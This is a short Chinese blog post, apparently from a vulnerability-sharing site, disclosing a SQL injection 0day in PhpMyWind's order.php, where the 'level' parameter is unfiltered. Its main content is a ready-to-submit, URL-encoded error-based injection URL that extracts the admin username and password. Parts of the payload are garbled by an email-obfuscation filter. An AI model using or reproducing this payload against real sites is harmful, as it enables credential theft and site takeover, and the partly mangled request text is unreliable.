PhpMyWind SQL Injection 的另一个0day

  • A+
所属分类:漏洞时代
摘要

order.php第39行$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

order.php第39行

$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

直接提交
[php]
http://xxx.com/phpmywind/order.php?action=getarea&level=1%20%20or%[email protected]`/’`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(username,0x7e,password)%20from%20`%[email protected]__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%[email protected]`/’`=0%23[/php]

作者:lcx

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: